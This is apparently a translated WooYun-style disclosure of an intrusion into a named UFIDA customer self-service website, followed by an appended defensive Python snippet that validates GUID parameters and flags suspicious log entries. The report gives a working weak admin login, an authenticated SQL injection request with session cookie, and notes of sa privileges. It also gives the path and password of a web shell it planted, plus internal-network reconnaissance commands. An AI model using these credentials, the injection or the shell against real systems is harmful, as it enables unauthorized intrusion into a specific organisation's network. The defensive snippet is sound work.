### Brief description:

Weak password, SQL injection, getshell

### Details:

System URL: http://vip.ufida.com.cn/Frame/Index.aspx

![QQ截图20151021162136.jpg](https://images.seebug.org/upload/201510/211621187861fbd42f94e62a918639c6421ddce5.jpg)

Weak-password account: adminnc, password: adminnc

![QQ截图20151021162437.jpg](https://images.seebug.org/upload/201510/21162318d4fb4043dcf5f3c510b9cd10affaa228.jpg)

An injection point was found in the self-service query feature (login is required; note that the cookie expires):

![QQ截图20151021162521.jpg](https://images.seebug.org/upload/201510/211624159e5956a880d0a2fd338d8469b81bb8da.jpg)

```
GET http://vip.ufida.com.cn/RepositorySearchInfo/DoctInfo.aspx?ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://vip.ufida.com.cn/RepositorySearchInfo/DoctList.aspx?Type=MainPageClick
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: vip.ufida.com.cn
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=szvzcr45nfresnqlzjhbtsqe
```

![QQ截图20151021163123.jpg](https://images.seebug.org/upload/201510/21163040a9dc633bdb22d377d6fcb5ee476f63d3.jpg)

UNION is supported, with sa privileges.

![QQ截图20151021163229.jpg](https://images.seebug.org/upload/201510/211631126e092dde0a40298cfb73321672cc5f60.jpg)

### Proof of vulnerability:

![QQ截图20151021163307.jpg](https://images.seebug.org/upload/201510/2116314633f6808a598ed29377292914f5986e33.jpg)

The internal network is reachable.

![QQ截图20151021163526.jpg](https://images.seebug.org/upload/201510/21163420d35370b813ab3b64f84fb590a378a40c.jpg)

![QQ截图20151021164007.jpg](https://images.seebug.org/upload/201510/2116385293629987903b8e225330ae534e8a1c62.jpg)

After finding the web root path, a shell was written:

```
http://vip.ufida.com.cn/wooyun.aspx
```

Password: wpp

![QQ截图20151021164403.jpg](https://images.seebug.org/upload/201510/211642425968ea9a3abd7c42f933dd1fa7988c26.jpg)

With UNION supported, it is fast.

```
D:\E_data\战略客户自助系统网站\wwwroot\> arp -a
Interface: 192.168.8.90 --- 0x10003
```

![QQ截图20151021164507.jpg](https://images.seebug.org/upload/201510/2116434740416d223331d5c2dc8e640128cf0d0d.jpg)

![QQ截图20151021164542.jpg](https://images.seebug.org/upload/201510/2116442210f8474195d5d9afddc31b5795c40a87.jpg)

```
D:\E_data\战略客户自助系统网站\wwwroot\> net view
```
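An added example, not part of the original report: the `ReposID` value in the request above is a GUID, so a strict parse on the server side rejects anything else before it reaches SQL, and the same check run over web logs surfaces tampered requests to `DoctInfo.aspx`. The W3C log layout, the sample lines and the function names are assumptions made for this example.

```python
import re
import uuid
from urllib.parse import parse_qsl

PAGE = "/repositorysearchinfo/doctinfo.aspx"  # path from the report, lowercased
# uuid.UUID() also accepts braces, "urn:uuid:" and unhyphenated input, so the
# canonical 8-4-4-4-12 shape is enforced first.
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")


def parse_repos_id(raw):
    """Return a uuid.UUID only if raw is exactly one canonical GUID, else None."""
    if not isinstance(raw, str) or not GUID_RE.fullmatch(raw):
        return None
    return uuid.UUID(raw)


def flag_requests(log_lines):
    """Return (client_ip, ReposID values) for DoctInfo.aspx hits lacking one clean GUID."""
    cols, hits = [], []
    for line in log_lines:
        if line.startswith("#Fields:"):
            cols = line.split()[1:]  # the W3C header names the columns
            continue
        if line.startswith("#") or not cols:
            continue
        rec = dict(zip(cols, line.split()))
        if rec.get("cs-uri-stem", "").lower() != PAGE:
            continue
        query = rec.get("cs-uri-query", "-")
        pairs = parse_qsl("" if query == "-" else query, keep_blank_values=True)
        values = [v for k, v in pairs if k.lower() == "reposid"]
        # Missing, repeated or non-GUID values are all worth a look.
        if len(values) != 1 or parse_repos_id(values[0]) is None:
            hits.append((rec.get("c-ip"), values))
    return hits


# Constructed sample log; client IPs are documentation addresses.
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2015-10-21 08:20:01 GET /RepositorySearchInfo/DoctInfo.aspx ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f 198.51.100.7 200",
    "2015-10-21 08:21:13 GET /RepositorySearchInfo/DoctInfo.aspx ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f%27 203.0.113.9 500",
    "2015-10-21 08:21:40 GET /RepositorySearchInfo/DoctList.aspx Type=MainPageClick 198.51.100.7 200",
    "2015-10-21 08:22:02 GET /RepositorySearchInfo/DoctInfo.aspx - 203.0.113.9 200",
]

if __name__ == "__main__":
    for ip, values in flag_requests(SAMPLE_LOG):
        print(ip, values)
```

In the application itself the parsed GUID would be bound as a typed query parameter, and the database login behind the site would not be `sa`.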